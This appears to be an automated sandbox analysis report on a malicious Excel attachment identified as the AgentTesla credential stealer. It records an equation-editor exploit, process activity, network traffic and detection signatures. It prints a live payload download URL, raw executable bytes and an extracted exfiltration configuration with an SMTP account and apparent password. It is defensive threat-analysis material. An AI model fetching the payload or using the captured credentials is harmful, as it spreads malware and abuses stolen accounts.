Play interactive tour

Edit tour

Analysis Report ORDER 9387383900.xlsx

Overview

General Information

Sample Name:	ORDER 9387383900.xlsx
Analysis ID:	385366
MD5:	6cd928e3be0956061f518082a5acb60b
SHA1:	0e377a42bd4197fceb15e458ccfb46445e7f0132
SHA256:	19a975e2303b2394ab8ec3550799702b6a6a1eb166c588e90619e2c117baf73f
Tags:	VelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected AgentTesla

Yara detected AntiVM3

.NET source code contains very large array initializations

Drops PE files to the user root directory

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 1552 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

EQNEDT32.EXE (PID: 2332 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2916 cmdline: 'C:\Users\Public\vbc.exe' MD5: ABEB7AA739C4F99C996B91E51A1FA885)

vbc.exe (PID: 3044 cmdline: C:\Users\Public\vbc.exe MD5: ABEB7AA739C4F99C996B91E51A1FA885)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "razilogs@razilogs.comDANIEL3116us2.smtp.mailhostbox.com"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000005.00000002.2345331477.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.2345949925.00000000024F4000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.2345949925.00000000024F4000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2153220884.00000000035C9000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: vbc.exe PID: 3044	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: vbc.exe PID: 3044	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: vbc.exe PID: 2916	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: vbc.exe PID: 2916	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author
4.2.vbc.exe.387bed0.4.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.vbc.exe.387bed0.4.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.vbc.exe.400000.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.vbc.exe.3662578.5.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Sigma Overview

System Summary:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 198.23.213.61, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2332, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2332, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rrr[1].exe

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://198.23.213.61/rrr.exe

Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 5.2.vbc.exe.400000.1.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "razilogs@razilogs.comDANIEL3116us2.smtp.mailhostbox.com"}

Multi AV Scanner detection for submitted file

Show sources

Source: ORDER 9387383900.xlsx

Virustotal: Detection: 33%

Perma Link

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rrr[1].exe	Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h

4_2_006684D8

Source: global traffic

DNS query: name: us2.smtp.mailhostbox.com

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 198.23.213.61:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 198.23.213.61:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49166 -> 208.91.199.225:587

Source: global traffic

TCP traffic: 192.168.2.22:49166 -> 208.91.199.225:587

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 12 Apr 2021 09:34:49 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27Last-Modified: Mon, 12 Apr 2021 08:37:15 GMTETag: "ddc00-5bfc26bb7fa1d"Accept-Ranges: bytesContent-Length: 908288Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 bb 06 74 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 bc 0c 00 00 1e 01 00 00 00 00 00 fe da 0c 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 da 0c 00 4b 00 00 00 00 e0 0c 00 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 bb 0c 00 00 20 00 00 00 bc 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 1c 01 00 00 e0 0c 00 00 1c 01 00 00 be 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0e 00 00 02 00 00 00 da 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 da 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 9c ed 0b 00 14 ed 00 00 03 00 00 00 01 00 00 06 f8 13 02 00 98 d9 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 23 00 00 00 00 00 00 00 2b 02 26 16 00 00 28 01 00 00 0a 28 02 00 00 0a 00 de 02 00 dc 00 28 0b 00 00 06 02 6f 03 00 00 0a 00 2a 00 01 10 00 00 02 00 05 00 0e 13 00 02 00 00 00 00 13 30 02 00 23 01 00 00 01 00 00 11 2b 02 26 16 00 38 0a 01 00 00 02 16 38 e8 00 00 00 00 2b 3a 06 1f 63 61 0a 2b 1e 07 1f 6a 61 0b 07 1f 6f 58 45 04 00 00 00 0a 00 00 00 15 00 00 00 27 00 00 00 5d 00 00 00 1f 5d 28 9d 01 00 06 0b 2b d8 d0 01 00 00 06 26 1f fb 0b 2b cd 1f 62 28 9d 01 00 06 0a 1f 64 28 dc 01 00 06 0b 2b bb 06 1f 5c 58 45 0a 00 00 00 0a 00 00 00 13 00 00 00 21 00 00 00 2a 00 00 00 39 00 00 00 48 00 00 00 56 00 00 00 5f 00 00 00 7a 00 00 00 91 00 00 00 1f f8 0b 2b 85 38 79 ff ff ff 00 1f ce 0a 38 70 ff ff ff 00 1f 6a 28 9d 01 00 06 0a 38 62 ff ff ff 00 1f c4 0a 38 59 ff ff ff 02 17 28 07 00 00 0a 1f c9 0a 38 4a ff ff ff 02 17 28 08 00 00 0a 1f c6 0a 38 3b ff ff ff d0 03 0

Source: Joe Sandbox View

IP Address: 208.91.199.225 208.91.199.225

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: global traffic

TCP traffic: 192.168.2.22:49166 -> 208.91.199.225:587

Source: global traffic

HTTP traffic detected: GET /rrr.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.213.61Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9C9F6B5.emf

Jump to behavior

Source: global traffic

Source: unknown

DNS traffic detected: queries for: us2.smtp.mailhostbox.com

Source: vbc.exe, 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: vbc.exe, 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: vbc.exe, 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmp	String found in binary or memory: http://htJAdA.com
Source: vbc.exe, 00000005.00000002.2346816139.0000000005E40000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.2152952419.00000000025C1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vbc.exe, 00000005.00000002.2346025048.0000000002598000.00000004.00000001.sdmp	String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: vbc.exe, 00000005.00000002.2346816139.0000000005E40000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: F3AA532.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, 00000005.00000002.2345938081.00000000024DA000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%
Source: vbc.exe, 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: vbc.exe, 00000005.00000002.2345994356.000000000255A000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2346039166.00000000025A9000.00000004.00000001.sdmp	String found in binary or memory: https://bfdUomDwe8FRPCAbrg.com
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: vbc.exe, 00000004.00000002.2153220884.00000000035C9000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2345331477.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: vbc.exe, 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: Enable Editing from the 18 . yellow bar above 19 This document is 20 protected 3. Once you have e
Source: Screenshot number: 4	Screenshot OCR: Enable Content from the yellow bar above 21 22 23 24 25 " Z(:)"'""' 27 28 0 29 . 30 31
Source: Screenshot number: 8	Screenshot OCR: Enable Editing from the 18 . yellow bar above 19 This document is 20 protected 3. Once you have e
Source: Screenshot number: 8	Screenshot OCR: Enable Content from the yellow bar above 21 22 23 24 25 " Z(:)"'""' 27 28 0 29 . 30 31
Source: Screenshot number: 12	Screenshot OCR: Enable Content from the yellow bar above 21 22 23 24 25 " Z(:)"''"' 27 28 . 29 30

.NET source code contains very large array initializations

Show sources

Source: 5.2.vbc.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007b9C7F6A15u002dF507u002d449Bu002dA77Cu002dF679FE507AF2u007d/B98B4337u002d58F8u002d4581u002dA8DCu002d221E532A33BF.cs

Large array initialization: .cctor: array initializer size 11960

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rrr[1].exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00661BC0 NtQueryInformationProcess,		4_2_00661BC0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00661BB8 NtQueryInformationProcess,		4_2_00661BB8

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00216012	4_2_00216012
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00218620	4_2_00218620
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021A778	4_2_0021A778
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00219850	4_2_00219850
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00215C68	4_2_00215C68
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00218E99	4_2_00218E99
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021C0A0	4_2_0021C0A0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021C0B0	4_2_0021C0B0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021932A	4_2_0021932A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021C3C1	4_2_0021C3C1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021B521	4_2_0021B521
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021B530	4_2_0021B530
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002145B0	4_2_002145B0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002145C0	4_2_002145C0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021A723	4_2_0021A723
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021C738	4_2_0021C738
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002188D1	4_2_002188D1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021D924	4_2_0021D924
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021C931	4_2_0021C931
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021C940	4_2_0021C940
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002179E8	4_2_002179E8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002119F8	4_2_002119F8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00215C58	4_2_00215C58
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021CD89	4_2_0021CD89
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00664051	4_2_00664051
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00666E38	4_2_00666E38
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00662D18	4_2_00662D18
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00664518	4_2_00664518
Source: C:\Users\Public\vbc.exe	Code function: 4_2_006601A8	4_2_006601A8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00661981	4_2_00661981
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00660478	4_2_00660478
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00660AE8	4_2_00660AE8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_006626B1	4_2_006626B1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00662710	4_2_00662710
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00666DEA	4_2_00666DEA
Source: C:\Users\Public\vbc.exe	Code function: 4_2_006667F0	4_2_006667F0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00666BC8	4_2_00666BC8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00666DAF	4_2_00666DAF
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00661188	4_2_00661188
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00661198	4_2_00661198
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001E5328	5_2_001E5328
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001E6348	5_2_001E6348
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001E5670	5_2_001E5670
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001EB808	5_2_001EB808
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001E208F	5_2_001E208F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001EC974	5_2_001EC974
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00356A30	5_2_00356A30
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00359830	5_2_00359830
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00354600	5_2_00354600
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0035CC03	5_2_0035CC03
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00350048	5_2_00350048
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003514B8	5_2_003514B8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00355380	5_2_00355380
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00353248	5_2_00353248
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003584D0	5_2_003584D0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003552D2	5_2_003552D2
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0035D1E8	5_2_0035D1E8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00359B0C	5_2_00359B0C

Source: ORDER 9387383900.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: rrr[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: 5.2.vbc.exe.400000.1.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.2.vbc.exe.400000.1.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winXLSX@6/10@1/2

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$ORDER 9387383900.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRBF96.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);

Source: ORDER 9387383900.xlsx

Virustotal: Detection: 33%

